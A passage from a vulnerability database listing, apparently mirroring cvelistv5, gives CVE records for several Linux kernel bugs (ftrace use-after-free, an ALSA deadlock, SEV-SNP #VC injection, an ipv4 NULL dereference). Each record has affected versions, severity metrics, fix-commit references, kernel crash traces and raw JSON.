Affected: ae6aa16fdc163afe6b04b6c073ad4ddd4663c03b , < 31310e373f4c8c74e029d4326b283e757edabc0b (git)
Affected: ae6aa16fdc163afe6b04b6c073ad4ddd4663c03b , < e60b613df8b6253def41215402f72986fee3fc8d (git)

Linux

Affected: 3.7
Unaffected: 0 , < 3.7 (semver)
Unaffected: 5.4.286 , ≤ 5.4.* (semver)
Unaffected: 5.10.227 , ≤ 5.10.* (semver)
Unaffected: 5.15.162 , ≤ 5.15.* (semver)
Unaffected: 6.1.93 , ≤ 6.1.* (semver)
Unaffected: 6.6.33 , ≤ 6.6.* (semver)
Unaffected: 6.8.12 , ≤ 6.8.* (semver)
Unaffected: 6.9.3 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 7.8,
              "baseSeverity": "HIGH",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "HIGH",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-38588",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-10-30T19:17:19.872138Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-416",
                "description": "CWE-416 Use After Free",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-10-30T19:18:45.225Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T20:38:10.030Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8ea8ef5e42173560ac510e92a1cc797ffeea8831"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/dbff5f0bfb2416b8b55c105ddbcd4f885e98fada"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7b4881da5b19f65709f5c18c1a4d8caa2e496461"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/66df065b3106964e667b37bf8f7e55ec69d0c1f6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/31310e373f4c8c74e029d4326b283e757edabc0b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e60b613df8b6253def41215402f72986fee3fc8d"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/03/msg00002.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "kernel/trace/ftrace.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "eea46baf145150910ba134f75a67106ba2222c1b",
              "status": "affected",
              "version": "ae6aa16fdc163afe6b04b6c073ad4ddd4663c03b",
              "versionType": "git"
            },
            {
              "lessThan": "1880a324af1c95940a7c954b6b937e86844a33bd",
              "status": "affected",
              "version": "ae6aa16fdc163afe6b04b6c073ad4ddd4663c03b",
              "versionType": "git"
            },
            {
              "lessThan": "8ea8ef5e42173560ac510e92a1cc797ffeea8831",
              "status": "affected",
              "version": "ae6aa16fdc163afe6b04b6c073ad4ddd4663c03b",
              "versionType": "git"
            },
            {
              "lessThan": "dbff5f0bfb2416b8b55c105ddbcd4f885e98fada",
              "status": "affected",
              "version": "ae6aa16fdc163afe6b04b6c073ad4ddd4663c03b",
              "versionType": "git"
            },
            {
              "lessThan": "7b4881da5b19f65709f5c18c1a4d8caa2e496461",
              "status": "affected",
              "version": "ae6aa16fdc163afe6b04b6c073ad4ddd4663c03b",
              "versionType": "git"
            },
            {
              "lessThan": "66df065b3106964e667b37bf8f7e55ec69d0c1f6",
              "status": "affected",
              "version": "ae6aa16fdc163afe6b04b6c073ad4ddd4663c03b",
              "versionType": "git"
            },
            {
              "lessThan": "31310e373f4c8c74e029d4326b283e757edabc0b",
              "status": "affected",
              "version": "ae6aa16fdc163afe6b04b6c073ad4ddd4663c03b",
              "versionType": "git"
            },
            {
              "lessThan": "e60b613df8b6253def41215402f72986fee3fc8d",
              "status": "affected",
              "version": "ae6aa16fdc163afe6b04b6c073ad4ddd4663c03b",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "kernel/trace/ftrace.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.7"
            },
            {
              "lessThan": "3.7",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.286",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.227",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.162",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.93",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.33",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.286",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.227",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.162",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.93",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.33",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.12",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.3",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nftrace: Fix possible use-after-free issue in ftrace_location()\n\nKASAN reports a bug:\n\n  BUG: KASAN: use-after-free in ftrace_location+0x90/0x120\n  Read of size 8 at addr ffff888141d40010 by task insmod/424\n  CPU: 8 PID: 424 Comm: insmod Tainted: G        W          6.9.0-rc2+\n  [...]\n  Call Trace:\n   \u003cTASK\u003e\n   dump_stack_lvl+0x68/0xa0\n   print_report+0xcf/0x610\n   kasan_report+0xb5/0xe0\n   ftrace_location+0x90/0x120\n   register_kprobe+0x14b/0xa40\n   kprobe_init+0x2d/0xff0 [kprobe_example]\n   do_one_initcall+0x8f/0x2d0\n   do_init_module+0x13a/0x3c0\n   load_module+0x3082/0x33d0\n   init_module_from_file+0xd2/0x130\n   __x64_sys_finit_module+0x306/0x440\n   do_syscall_64+0x68/0x140\n   entry_SYSCALL_64_after_hwframe+0x71/0x79\n\nThe root cause is that, in lookup_rec(), ftrace record of some address\nis being searched in ftrace pages of some module, but those ftrace pages\nat the same time is being freed in ftrace_release_mod() as the\ncorresponding module is being deleted:\n\n           CPU1                       |      CPU2\n  register_kprobes() {                | delete_module() {\n    check_kprobe_address_safe() {     |\n      arch_check_ftrace_location() {  |\n        ftrace_location() {           |\n          lookup_rec() // USE!        |   ftrace_release_mod() // Free!\n\nTo fix this issue:\n  1. Hold rcu lock as accessing ftrace pages in ftrace_location_range();\n  2. Use ftrace_location_range() instead of lookup_rec() in\n     ftrace_location();\n  3. Call synchronize_rcu() before freeing any ftrace pages both in\n     ftrace_process_locs()/ftrace_release_mod()/ftrace_free_mem()."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:14:44.284Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/eea46baf145150910ba134f75a67106ba2222c1b"
        },
        {
          "url": "https://git.kernel.org/stable/c/1880a324af1c95940a7c954b6b937e86844a33bd"
        },
        {
          "url": "https://git.kernel.org/stable/c/8ea8ef5e42173560ac510e92a1cc797ffeea8831"
        },
        {
          "url": "https://git.kernel.org/stable/c/dbff5f0bfb2416b8b55c105ddbcd4f885e98fada"
        },
        {
          "url": "https://git.kernel.org/stable/c/7b4881da5b19f65709f5c18c1a4d8caa2e496461"
        },
        {
          "url": "https://git.kernel.org/stable/c/66df065b3106964e667b37bf8f7e55ec69d0c1f6"
        },
        {
          "url": "https://git.kernel.org/stable/c/31310e373f4c8c74e029d4326b283e757edabc0b"
        },
        {
          "url": "https://git.kernel.org/stable/c/e60b613df8b6253def41215402f72986fee3fc8d"
        }
      ],
      "title": "ftrace: Fix possible use-after-free issue in ftrace_location()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-38588",
    "datePublished": "2024-06-19T13:37:43.262Z",
    "dateReserved": "2024-06-18T19:36:34.929Z",
    "dateUpdated": "2025-11-03T20:38:10.030Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-38600 (GCVE-0-2024-38600)

Vulnerability from cvelistv5 – Published: 2024-06-19 13:45 – Updated: 2025-05-21 09:12

Title

ALSA: Fix deadlocks with kctl removals at disconnection

Summary

In the Linux kernel, the following vulnerability has been resolved: ALSA: Fix deadlocks with kctl removals at disconnection In snd_card_disconnect(), we set card->shutdown flag at the beginning, call callbacks and do sync for card->power_ref_sleep waiters at the end. The callback may delete a kctl element, and this can lead to a deadlock when the device was in the suspended state. Namely: * A process waits for the power up at snd_power_ref_and_wait() in snd_ctl_info() or read/write() inside card->controls_rwsem. * The system gets disconnected meanwhile, and the driver tries to delete a kctl via snd_ctl_remove*(); it tries to take card->controls_rwsem again, but this is already locked by the above. Since the sleeper isn't woken up, this deadlocks. An easy fix is to wake up sleepers before processing the driver disconnect callbacks but right after setting the card->shutdown flag. Then all sleepers will abort immediately, and the code flows again. So, basically this patch moves the wait_event() call at the right timing. While we're at it, just to be sure, call wait_event_all() instead of wait_event(), although we don't use exclusive events on this queue for now.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/ff80185e7b7b547a0…
	https://git.kernel.org/stable/c/c2fb439f4f1425a96…
	https://git.kernel.org/stable/c/2f103287ef7960854…
	https://git.kernel.org/stable/c/88ce3fe255d58a936…
	https://git.kernel.org/stable/c/6b55e879e7bd023a0…
	https://git.kernel.org/stable/c/87988a534d8e12f2e…

Impacted products

Vendor

Product

Version

Linux

Affected: e94fdbd7b25d87e64688bb109e2c550217a4c879 , < ff80185e7b7b547a0911fcfc8aefc61c3e8304d7 (git)
Affected: e94fdbd7b25d87e64688bb109e2c550217a4c879 , < c2fb439f4f1425a961d20bec818fed2c2d9ef70a (git)
Affected: e94fdbd7b25d87e64688bb109e2c550217a4c879 , < 2f103287ef7960854808930499d1181bd0145d68 (git)
Affected: e94fdbd7b25d87e64688bb109e2c550217a4c879 , < 88ce3fe255d58a93624b467af036dc3519f309c7 (git)
Affected: e94fdbd7b25d87e64688bb109e2c550217a4c879 , < 6b55e879e7bd023a03888fc6c8339edf82f576f4 (git)
Affected: e94fdbd7b25d87e64688bb109e2c550217a4c879 , < 87988a534d8e12f2e6fc01fe63e6c1925dc5307c (git)

Linux

Affected: 5.14
Unaffected: 0 , < 5.14 (semver)
Unaffected: 5.15.161 , ≤ 5.15.* (semver)
Unaffected: 6.1.93 , ≤ 6.1.* (semver)
Unaffected: 6.6.33 , ≤ 6.6.* (semver)
Unaffected: 6.8.12 , ≤ 6.8.* (semver)
Unaffected: 6.9.3 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:12:26.017Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ff80185e7b7b547a0911fcfc8aefc61c3e8304d7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c2fb439f4f1425a961d20bec818fed2c2d9ef70a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2f103287ef7960854808930499d1181bd0145d68"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/88ce3fe255d58a93624b467af036dc3519f309c7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6b55e879e7bd023a03888fc6c8339edf82f576f4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/87988a534d8e12f2e6fc01fe63e6c1925dc5307c"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-38600",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:13:24.578390Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:54.201Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "sound/core/init.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "ff80185e7b7b547a0911fcfc8aefc61c3e8304d7",
              "status": "affected",
              "version": "e94fdbd7b25d87e64688bb109e2c550217a4c879",
              "versionType": "git"
            },
            {
              "lessThan": "c2fb439f4f1425a961d20bec818fed2c2d9ef70a",
              "status": "affected",
              "version": "e94fdbd7b25d87e64688bb109e2c550217a4c879",
              "versionType": "git"
            },
            {
              "lessThan": "2f103287ef7960854808930499d1181bd0145d68",
              "status": "affected",
              "version": "e94fdbd7b25d87e64688bb109e2c550217a4c879",
              "versionType": "git"
            },
            {
              "lessThan": "88ce3fe255d58a93624b467af036dc3519f309c7",
              "status": "affected",
              "version": "e94fdbd7b25d87e64688bb109e2c550217a4c879",
              "versionType": "git"
            },
            {
              "lessThan": "6b55e879e7bd023a03888fc6c8339edf82f576f4",
              "status": "affected",
              "version": "e94fdbd7b25d87e64688bb109e2c550217a4c879",
              "versionType": "git"
            },
            {
              "lessThan": "87988a534d8e12f2e6fc01fe63e6c1925dc5307c",
              "status": "affected",
              "version": "e94fdbd7b25d87e64688bb109e2c550217a4c879",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "sound/core/init.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.14"
            },
            {
              "lessThan": "5.14",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.161",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.93",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.33",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.161",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.93",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.33",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.12",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.3",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: Fix deadlocks with kctl removals at disconnection\n\nIn snd_card_disconnect(), we set card-\u003eshutdown flag at the beginning,\ncall callbacks and do sync for card-\u003epower_ref_sleep waiters at the\nend.  The callback may delete a kctl element, and this can lead to a\ndeadlock when the device was in the suspended state.  Namely:\n\n* A process waits for the power up at snd_power_ref_and_wait() in\n  snd_ctl_info() or read/write() inside card-\u003econtrols_rwsem.\n\n* The system gets disconnected meanwhile, and the driver tries to\n  delete a kctl via snd_ctl_remove*(); it tries to take\n  card-\u003econtrols_rwsem again, but this is already locked by the\n  above.  Since the sleeper isn\u0027t woken up, this deadlocks.\n\nAn easy fix is to wake up sleepers before processing the driver\ndisconnect callbacks but right after setting the card-\u003eshutdown flag.\nThen all sleepers will abort immediately, and the code flows again.\n\nSo, basically this patch moves the wait_event() call at the right\ntiming.  While we\u0027re at it, just to be sure, call wait_event_all()\ninstead of wait_event(), although we don\u0027t use exclusive events on\nthis queue for now."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-21T09:12:43.203Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/ff80185e7b7b547a0911fcfc8aefc61c3e8304d7"
        },
        {
          "url": "https://git.kernel.org/stable/c/c2fb439f4f1425a961d20bec818fed2c2d9ef70a"
        },
        {
          "url": "https://git.kernel.org/stable/c/2f103287ef7960854808930499d1181bd0145d68"
        },
        {
          "url": "https://git.kernel.org/stable/c/88ce3fe255d58a93624b467af036dc3519f309c7"
        },
        {
          "url": "https://git.kernel.org/stable/c/6b55e879e7bd023a03888fc6c8339edf82f576f4"
        },
        {
          "url": "https://git.kernel.org/stable/c/87988a534d8e12f2e6fc01fe63e6c1925dc5307c"
        }
      ],
      "title": "ALSA: Fix deadlocks with kctl removals at disconnection",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-38600",
    "datePublished": "2024-06-19T13:45:48.635Z",
    "dateReserved": "2024-06-18T19:36:34.932Z",
    "dateUpdated": "2025-05-21T09:12:43.203Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-25742 (GCVE-0-2024-25742)

Vulnerability from cvelistv5 – Published: 2024-05-17 21:14 – Updated: 2025-03-27 20:08

Summary

In the Linux kernel before 6.9, an untrusted hypervisor can inject virtual interrupt 29 (#VC) at any point in time and can trigger its handler. This affects AMD SEV-SNP and AMD SEV-ES.

Severity ?

6.5 (Medium)


                        
                          CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L

CWE

n/a

Assigner

mitre

References

URL

Tags

	https://www.amd.com/en/resources/product-security…
	https://github.com/torvalds/linux/commit/e3ef461a…
	https://git.kernel.org/cgit/linux/kernel/git/torv…
	https://cdn.kernel.org/pub/linux/kernel/v6.x/Chan…

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-01T23:52:05.760Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://www.amd.com/en/resources/product-security/bulletin/amd-sb-3008.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://github.com/torvalds/linux/commit/e3ef461af35a8c74f2f4ce6616491ddb355a208f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=e3ef461af35a8c74f2f4ce6616491ddb355a208f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.9"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "HIGH",
              "attackVector": "LOCAL",
              "availabilityImpact": "LOW",
              "baseScore": 6.5,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "HIGH",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-25742",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-20T14:09:31.331826Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-828",
                "description": "CWE-828 Signal Handler with Functionality that is not Asynchronous-Safe",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-03-27T20:08:11.967Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel before 6.9, an untrusted hypervisor can inject virtual interrupt 29 (#VC) at any point in time and can trigger its handler. This affects AMD SEV-SNP and AMD SEV-ES."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-05-17T21:19:48.853Z",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "url": "https://www.amd.com/en/resources/product-security/bulletin/amd-sb-3008.html"
        },
        {
          "url": "https://github.com/torvalds/linux/commit/e3ef461af35a8c74f2f4ce6616491ddb355a208f"
        },
        {
          "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=e3ef461af35a8c74f2f4ce6616491ddb355a208f"
        },
        {
          "url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.9"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2024-25742",
    "datePublished": "2024-05-17T21:14:08.723Z",
    "dateReserved": "2024-02-12T00:00:00.000Z",
    "dateUpdated": "2025-03-27T20:08:11.967Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-36008 (GCVE-0-2024-36008)

Vulnerability from cvelistv5 – Published: 2024-05-20 09:48 – Updated: 2025-05-04 09:10

Title

ipv4: check for NULL idev in ip_route_use_hint()

Summary

In the Linux kernel, the following vulnerability has been resolved: ipv4: check for NULL idev in ip_route_use_hint() syzbot was able to trigger a NULL deref in fib_validate_source() in an old tree [1]. It appears the bug exists in latest trees. All calls to __in_dev_get_rcu() must be checked for a NULL result. [1] general protection fault, probably for non-canonical address 0xdffffc0000000000: 0000 [#1] SMP KASAN KASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007] CPU: 2 PID: 3257 Comm: syz-executor.3 Not tainted 5.10.0-syzkaller #0 Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014 RIP: 0010:fib_validate_source+0xbf/0x15a0 net/ipv4/fib_frontend.c:425 Code: 18 f2 f2 f2 f2 42 c7 44 20 23 f3 f3 f3 f3 48 89 44 24 78 42 c6 44 20 27 f3 e8 5d 88 48 fc 4c 89 e8 48 c1 e8 03 48 89 44 24 18 <42> 80 3c 20 00 74 08 4c 89 ef e8 d2 15 98 fc 48 89 5c 24 10 41 bf RSP: 0018:ffffc900015fee40 EFLAGS: 00010246 RAX: 0000000000000000 RBX: ffff88800f7a4000 RCX: ffff88800f4f90c0 RDX: 0000000000000000 RSI: 0000000004001eac RDI: ffff8880160c64c0 RBP: ffffc900015ff060 R08: 0000000000000000 R09: ffff88800f7a4000 R10: 0000000000000002 R11: ffff88800f4f90c0 R12: dffffc0000000000 R13: 0000000000000000 R14: 0000000000000000 R15: ffff88800f7a4000 FS: 00007f938acfe6c0(0000) GS:ffff888058c00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f938acddd58 CR3: 000000001248e000 CR4: 0000000000352ef0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: ip_route_use_hint+0x410/0x9b0 net/ipv4/route.c:2231 ip_rcv_finish_core+0x2c4/0x1a30 net/ipv4/ip_input.c:327 ip_list_rcv_finish net/ipv4/ip_input.c:612 [inline] ip_sublist_rcv+0x3ed/0xe50 net/ipv4/ip_input.c:638 ip_list_rcv+0x422/0x470 net/ipv4/ip_input.c:673 __netif_receive_skb_list_ptype net/core/dev.c:5572 [inline] __netif_receive_skb_list_core+0x6b1/0x890 net/core/dev.c:5620 __netif_receive_skb_list net/core/dev.c:5672 [inline] netif_receive_skb_list_internal+0x9f9/0xdc0 net/core/dev.c:5764 netif_receive_skb_list+0x55/0x3e0 net/core/dev.c:5816 xdp_recv_frames net/bpf/test_run.c:257 [inline] xdp_test_run_batch net/bpf/test_run.c:335 [inline] bpf_test_run_xdp_live+0x1818/0x1d00 net/bpf/test_run.c:363 